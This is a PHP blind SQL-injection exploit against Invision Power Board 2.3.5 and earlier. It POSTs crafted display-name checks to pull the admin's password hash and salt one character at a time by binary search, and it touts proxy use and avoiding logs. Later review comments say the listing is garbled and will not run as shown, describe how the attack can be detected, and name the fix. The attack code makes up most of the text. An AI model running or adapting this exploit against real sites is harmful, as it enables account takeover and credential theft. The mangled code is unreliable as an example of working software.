DESlock


<?php

error_reporting(E_ALL);

///////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////

// IPB <= 2.3.5 sql injection exploit

// Version 1.0

// written by Janek Vind "waraxe"

// Estonia, Tartu

// http://www.waraxe.us/

// 20. september 2008

// based on DarkFig's advisory

// http://acid-root.new.fr/?0:18

//

// FEATURES:

// 1. Fetching algorithm optimized for speed

// 2. Attack goes through $_POST, so no suspicious logs

// 3. Pretesting saves time if IPB is not vulnerable

//

// More useful tools: http://www.waraxe.us/tools/

// Waraxe forums: http://www.waraxe.us/forums.html

//

// NB! This exploit is meant to be run as php CLI!

// http://www.php.net/features.commandline

///////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////

// NOTE(review): the listing as reproduced on this page does not parse as-is:
// ASCII quotes were rendered as `\’`, several `-`/`+`/`++` operators were
// dropped or turned into en dashes (the for-loop headers and the retry
// counter below, for example), and backslashes inside string literals appear
// doubled. Read it as documentation of the technique, not as a runnable file.
//
// NOTE(review): on feature 2 above, "no suspicious logs" only holds for
// servers that log the request line alone. Every probe is a POST carrying
// act=xmlout&do=check-display-name with an encoded quote in `name` (see
// test_target_url() and test_condition()), so request-body logging, a WAF
// rule on that parameter, or alerting on a burst of near-identical
// check-display-name POSTs from one client makes a run visible.

//=====================================================================

// Configuration: target base URL, target member ID, table prefix, optional
// proxy and the local log file that add_line() appends to.
$url = \’http://localhost/ipb.2.3.5/\’;

$id = 1;// ID of the target user, default value "1" is admin\’s ID

$prefix = \’ibf_\’;// IPB table prefix, default is "ibf_"

# Proxy settings

# Be sure to use proxy 🙂

//$proxy_ip_port = \’127.0.0.1:8118\’;

//$proxy_user_password = \’someuser:somepassword\’;

$outfile = \’./ipblog.txt\’;// Log file

//======================================================================

///////////////////////////////////////////////////////////////////////

// Don't mess below this line, unless you know the stuff 😉

///////////////////////////////////////////////////////////////////////

//=====================================================================

///////////////////////////////////////////////////////////////////////

// Detect the SAPI once; xecho() reads this flag through $GLOBALS to decide
// between raw and HTML-escaped output.
$cli = php_sapi_name() === \’cli\’;

//=====================================================================

// Warning, if executed from webserver

//=====================================================================

// Outside the CLI, refuse to run until the request carries `wtf-is-cli`
// (the submit button rendered below); once it does, lift the execution time
// limit best-effort (the @ hides the warning when the limit cannot be changed).
if(!$cli)

{

if(!isset($_REQUEST[\’wtf-is-cli\’]))

{

echo "<html><head><title>Attention!</title></head>\\n";

echo "<body><br /><br /><center>\\n";

echo "<h1>Warning!</h1>\\n";

echo "This exploit is meant to be used as php CLI script!<br />\\n";

echo "More information:<br />\\n";

echo "<a href=\\"http://www.google.com/search?hl=en&q=php cli windows\\" target=\\"_blank\\">http://www.google.com/search?hl=en&q=php cli windows</a><br />\\n";

echo "Still, you can try to run it from webserver.<br />\\n";

echo "Just press the button below and prepare for long waiting<br />\\n";

echo "And learn to use php CLI next time, please …<br />\\n";

echo "<form method=\\"get\\">\\n";

echo "<input type=\\"submit\\" name=\\"wtf-is-cli\\" value=\\"Let me in, i don\’t care\\">\\n";

echo "</form>\\n";

echo "</center></body></html>\\n";

exit;

}

else

{

// Let's try to maximize our chances without CLI

@set_time_limit(0);

}

}

//=====================================================================

// Main flow. Both pretests die() on failure, so everything after them may
// assume the target answered `found` to the probes. get_hash() and get_salt()
// recover one character per binary search; the results are appended to
// $outfile via add_line() and printed via xecho().
xecho("Target: $url\\n");

xecho("Sql table prefix: $prefix\\n");

xecho("Testing target URL … \\n");

test_target_url();

xecho("Target URL seems to be valid\\n");

xecho("Testing target ID … \\n");

test_target_id();

xecho("Target ID seems to be valid\\n");

$hash = get_hash();

$salt = get_salt();

add_line("Target: $url");

add_line("User ID: $id");

add_line("Hash: $hash");

add_line("Salt: $salt");

add_line("——————————————");

xecho("\\n——————————————\\n");

xecho("Hash: $hash\\n");

xecho("Salt: $salt");

xecho("\\n——————————————\\n");

xecho("\\nQuestions and feedback – http://www.waraxe.us/ \\n");

die("See ya! 🙂 \\n");

//////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////

/**
 * Pretest of the target URL.
 *
 * Sends one POST to the global $url (also used as Referer) carrying
 * act=xmlout&do=check-display-name with an injected quote in `name`, and
 * expects the literal body `found`. Any other body ends the script via die().
 */
function test_target_url()

{

global $url;

$post = \’act=xmlout&do=check-display-name&name=somethingfoobarkind%27 OR 1=1– \’;

$buff = trim(make_post($url, $post, \’\’, $url));

// Only the exact body `found` (after trim) counts as a valid target.
if($buff !== \’found\’)

{

die(\’Invalid response, target URL not valid? Exiting …\’);

}

}

//////////////////////////////////////////////////////////////////////

/**
 * Pretest of the target member ID.
 *
 * Asks test_condition() whether a `<prefix>members_converge` row exists with
 * converge_id = $id and a 32-character converge_pass_hash; dies otherwise.
 * Reads the globals $url (through test_condition), $prefix and $id.
 */
function test_target_id()

{

global $url, $prefix, $id;

// The 32-character check is what later lets get_hash() assume a fixed length.
$post = \’UNION SELECT 1,1 FROM \’ . $prefix . \’members_converge WHERE converge_id=\’ . $id . \’ AND LENGTH(converge_pass_hash)=32\’;

if(!test_condition($post))

{

die(\’Invalid response, target ID not valid? Exiting …\’);

}

}

///////////////////////////////////////////////////////////////////////

/**
 * Recover the 5-character converge_pass_salt of the target member.
 *
 * Calls get_saltchar() once per position, echoing progress after each one,
 * and returns the concatenated result.
 *
 * NOTE(review): the for-loop header as reproduced here lost its `+`/`++`
 * operators; read it as positions 1 through $len.
 *
 * @return string The recovered salt.
 */
function get_salt()

{

$len = 5;

$out = \’\’;

xecho("Finding salt …\\n");

for($i = 1; $i < $len 1; $i )

{

$ch = get_saltchar($i);

xecho("Got pos $i –> $ch\\n");

$out .= "$ch";

xecho("Current salt: $out \\n");

}

xecho("\\nFinal salt: $out\\n\\n");

return $out;

}

///////////////////////////////////////////////////////////////////////

/**
 * Recover the byte at position $pos of converge_pass_salt for member $id.
 *
 * Binary search over the byte value in the window [$min, $max] = [32, 128]:
 * each round sends test_condition() a probe of the form
 * `... AND ORD(SUBSTR(converge_pass_salt,$pos,1)) > $curr` (`%3e` is a
 * URL-encoded `>`) and keeps the half that answered. When fewer than two
 * candidates remain, one equality probe against $max decides, and chr() of
 * the winner is returned.
 *
 * NOTE(review): in this listing the interval-width and midpoint lines lost
 * their `-`/`+` operators (an en dash and a missing sign, respectively).
 *
 * @param int $pos 1-based position inside the salt.
 * @return string One character.
 */
function get_saltchar($pos)

{

global $prefix, $id;

$char = \’\’;

// Search window over byte values 32..128.
$min = 32;

$max = 128;

$pattern = \’UNION SELECT 1,1 FROM \’ . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";

$curr = 0;

while(1)

{

$area = $max – $min;

// Two candidates left: test $max for equality, otherwise it is $min.
if($area < 2 )

{

$post = $pattern . "=$max";

$eq = test_condition($post);

if($eq)

{

$char = chr($max);

}

else

{

$char = chr($min);

}

break;

}

$half = intval(floor($area / 2));

$curr = $min $half;

// Greater than the midpoint keeps the upper half, otherwise the lower.
$post = $pattern . \’%3e\’ . $curr;

$bigger = test_condition($post);

if($bigger)

{

$min = $curr;

}

else

{

$max = $curr;

}

xecho("Current test: $curr-$max-$min\\n");

}

return $char;

}

///////////////////////////////////////////////////////////////////////

/**
 * Recover the 32-character converge_pass_hash of the target member.
 *
 * Calls get_hashchar() once per position, echoing progress after each one,
 * and returns the concatenated result. The fixed length matches the
 * LENGTH(converge_pass_hash)=32 pretest in test_target_id().
 *
 * NOTE(review): the for-loop header as reproduced here lost its `+`/`++`
 * operators; read it as positions 1 through $len.
 *
 * @return string The recovered hash.
 */
function get_hash()

{

$len = 32;

$out = \’\’;

xecho("Finding hash …\\n");

for($i = 1; $i < $len 1; $i )

{

$ch = get_hashchar($i);

xecho("Got pos $i –> $ch\\n");

$out .= "$ch";

xecho("Current hash: $out \\n");

}

xecho("\\nFinal hash: $out\\n\\n");

return $out;

}

///////////////////////////////////////////////////////////////////////

/**
 * Recover the character at position $pos of converge_pass_hash for member $id.
 *
 * A first probe asks whether ORD(SUBSTR(converge_pass_hash,$pos,1)) > 57,
 * i.e. whether the character lies above '9'; that selects the window
 * [97, 102] ('a'..'f') or [48, 57] ('0'..'9'). The rest is the same binary
 * search as get_saltchar(): halve the window on `> $curr` probes, then settle
 * the last two candidates with an equality probe on $max.
 *
 * Because the two windows cover only [0-9a-f], the routine assumes the stored
 * hash is lowercase hexadecimal; any other character would be misreported.
 *
 * NOTE(review): in this listing the interval-width and midpoint lines lost
 * their `-`/`+` operators (an en dash and a missing sign, respectively).
 *
 * @param int $pos 1-based position inside the hash.
 * @return string One character.
 */
function get_hashchar($pos)

{

global $prefix, $id;

$char = \’\’;

$pattern = \’UNION SELECT 1,1 FROM \’ . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";

// First let's determine, if it's number or letter (ORD > 57 means above '9').

$post = $pattern . \’%3e57\’;

$letter = test_condition($post);

if($letter)

{

$min = 97;

$max = 102;

xecho("Char to find is [a-f]\\n");

}

else

{

$min = 48;

$max = 57;

xecho("Char to find is [0-9]\\n");

}

$curr = 0;

while(1)

{

$area = $max – $min;

// Two candidates left: test $max for equality, otherwise it is $min.
if($area < 2 )

{

$post = $pattern . "=$max";

$eq = test_condition($post);

if($eq)

{

$char = chr($max);

}

else

{

$char = chr($min);

}

break;

}

$half = intval(floor($area / 2));

$curr = $min $half;

// Greater than the midpoint keeps the upper half, otherwise the lower.
$post = $pattern . \’%3e\’ . $curr;

$bigger = test_condition($post);

if($bigger)

{

$min = $curr;

}

else

{

$max = $curr;

}

xecho("Current test: $curr-$max-$min\\n");

}

return $char;

}

///////////////////////////////////////////////////////////////////////

/**
 * Boolean oracle: true when the injected SQL fragment $p holds on the target,
 * false when it does not.
 *
 * $p is spliced into the `name` field of the check-display-name request via
 * sprintf(); the `%%27`/`%%22` sequences are sprintf escapes for the literal
 * URL-encoded quote characters. The (trimmed) response body is mapped as:
 *   `found`                            -> true
 *   `notfound`                         -> false
 *   contains `<title>IPS Driver Error</title>` -> die() (SQL error, wrong $prefix?)
 *   anything else                      -> retry, at most $maxtry times, then die()
 *
 * NOTE(review): as reproduced here the retry counter is never advanced (the
 * increment operator was lost in extraction), so the "anything else" branch
 * would loop forever instead of giving up after $maxtry attempts.
 *
 * NOTE(review): the extraction relies on these three distinguishable server
 * responses. On the application side the fix is a parameterised query in the
 * display-name check; a generic error page would additionally remove the
 * driver-error signal this function uses to detect a wrong prefix.
 *
 * @param string $p SQL fragment placed after the injected quote.
 * @return bool
 */
function test_condition($p)

{

global $url;

$bret = false;

$maxtry = 10;

$try = 1;

$pattern = \’act=xmlout&do=check-display-name&name=%%27 OR 1=%%22%%27%%22 %s OR 1=%%22%%27%%22– \’;

$post = sprintf($pattern, $p);

while(1)

{

$buff = trim(make_post($url, $post, \’\’, $url));

if($buff === \’found\’)

{

$bret = true;

break;

}

elseif($buff === \’notfound\’)

{

break;

}

// An IPS error page means the query itself failed, not that the condition was false.
elseif(strpos($buff, \'<title>IPS Driver Error</title>\’) !== false)

{

die("Sql error! Wrong prefix?\\nExiting … ");

}

else

{

// Unexpected body (timeout, empty transfer, ...): retry a bounded number of times.
xecho("test_condition() – try $try – invalid return value …\\n");

$try ;

if($try > $maxtry)

{

die("Too many tries – exiting …\\n");

}

else

{

xecho("Trying again – try $try …\\n");

}

}

}

return $bret;

}

///////////////////////////////////////////////////////////////////////

/**
 * Perform a single HTTP POST with cURL and return the response body, or
 * false when curl_exec() fails.
 *
 * Redirects are not followed, the connect timeout is 120 seconds, and the
 * optional proxy is read from the script-level $proxy_ip_port /
 * $proxy_user_password settings through $GLOBALS.
 *
 * @param string       $url         Request URL.
 * @param string|array $post_fields Body handed straight to CURLOPT_POSTFIELDS.
 * @param string       $cookie      Cookie header value; skipped when empty.
 * @param string       $referer     Referer header value; skipped when empty.
 * @param bool         $headers     Only an exact TRUE includes the response
 *                                  headers in the returned string.
 * @return string|false
 */
function make_post($url, $post_fields = '', $cookie = '', $referer = '', $headers = FALSE)
{
    $options = [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_CONNECTTIMEOUT => 120,
        CURLOPT_POST           => 1,
        CURLOPT_POSTFIELDS     => $post_fields,
        CURLOPT_FOLLOWLOCATION => 0,
        CURLOPT_USERAGENT      => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)',
        // Strict comparison on purpose: anything but TRUE leaves headers off.
        CURLOPT_HEADER         => $headers === TRUE,
    ];

    // Optional outbound proxy, with optional credentials.
    if (!empty($GLOBALS['proxy_ip_port'])) {
        $options[CURLOPT_PROXY] = $GLOBALS['proxy_ip_port'];
        if (!empty($GLOBALS['proxy_user_password'])) {
            $options[CURLOPT_PROXYUSERPWD] = $GLOBALS['proxy_user_password'];
        }
    }

    if (!empty($cookie)) {
        $options[CURLOPT_COOKIE] = $cookie;
    }

    if (!empty($referer)) {
        $options[CURLOPT_REFERER] = $referer;
    }

    $handle = curl_init();
    curl_setopt_array($handle, $options);
    $body = curl_exec($handle);
    curl_close($handle);

    return $body;
}

///////////////////////////////////////////////////////////////////////

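/**
 * Append one line to the log file named by the global $outfile.
 *
 * The original opened the file with fopen('ab') and never checked the
 * result, so an unwritable path turned into a fwrite() on a non-resource.
 * file_put_contents() with FILE_APPEND does the open/write/close in one
 * call; LOCK_EX keeps concurrent appends from interleaving.
 *
 * @param string $line Text to append; a trailing newline is added.
 * @return bool true when the line was written, false when the file could not
 *              be opened or written (PHP still emits its warning).
 */
function add_line($line)
{
    global $outfile;

    $written = file_put_contents($outfile, $line . "\n", FILE_APPEND | LOCK_EX);

    return $written !== false;
}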

///////////////////////////////////////////////////////////////////////

/**
 * Print a progress line: verbatim on the CLI, HTML-escaped with <br />
 * line breaks when running under a web server. The mode comes from the
 * script-level $cli flag read through $GLOBALS.
 *
 * @param string $line Text to print (newlines included by the caller).
 */
function xecho($line)
{
    $runningOnCli = $GLOBALS['cli'];

    $rendered = $runningOnCli
        ? $line
        : nl2br(htmlspecialchars($line));

    echo $rendered;
}

//////////////////////////////////////////////////////////////////////

?>
